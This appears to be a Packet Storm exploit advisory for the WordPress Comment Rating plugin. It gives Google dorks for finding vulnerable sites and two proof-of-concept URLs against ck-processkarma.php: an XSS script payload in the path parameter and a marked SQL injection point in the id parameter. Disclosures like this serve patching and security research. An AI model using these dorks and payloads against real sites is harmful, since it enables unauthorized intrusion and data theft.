WordPress Comment Rating Cross Site Scripting / SQL Injection

2012-01-03T00:00:00
ID PACKETSTORM:108314
Type packetstorm
Reporter The Evil Thinker
Modified 2012-01-03T00:00:00

Description

                                        
                                            `# Exploit Title: Wordpress comment rating plugin multiple Vulnerabilities  
# Google Dork: 1- inurl:"/wp-content/plugins/comment-rating/"  
# 2- inurl:"/ck-processkarma.php?id="  
# Date: 2/1/2012  
# Author: The Evil Thinker  
# Contact : Enstene156@hotmail.fr  
# Software Link: www.wordpress.com  
# Vulnerable plugin: Comment rating plugin  
# Tested on: Linux  
  
Details :  
---------  
  
the vulnerable file is "ck-processkarma.php"  
the script doesn't filter the input parameters (id "sql", path "XSS")  
  
Poc 1 (XSS) :  
  
http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex=  
  
  
Poc 2 (SQL injection) :  
  
http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]*****Inject_me_From_Here*****&action=add&path=TheMilkeyWay.exe/wp-content/plugins/comment-rating/&imgIndex=  
  
-------------------------------------------------------------------------------------------  
  
Special Graetz : Zack (DBA-HACKER) , Siper-N , Root-Mar , Anash , H!ch4m , Dr.Unknown , Mario-Gomez , BiiF0 , o Bla mantawel LLista  
  
  
  
`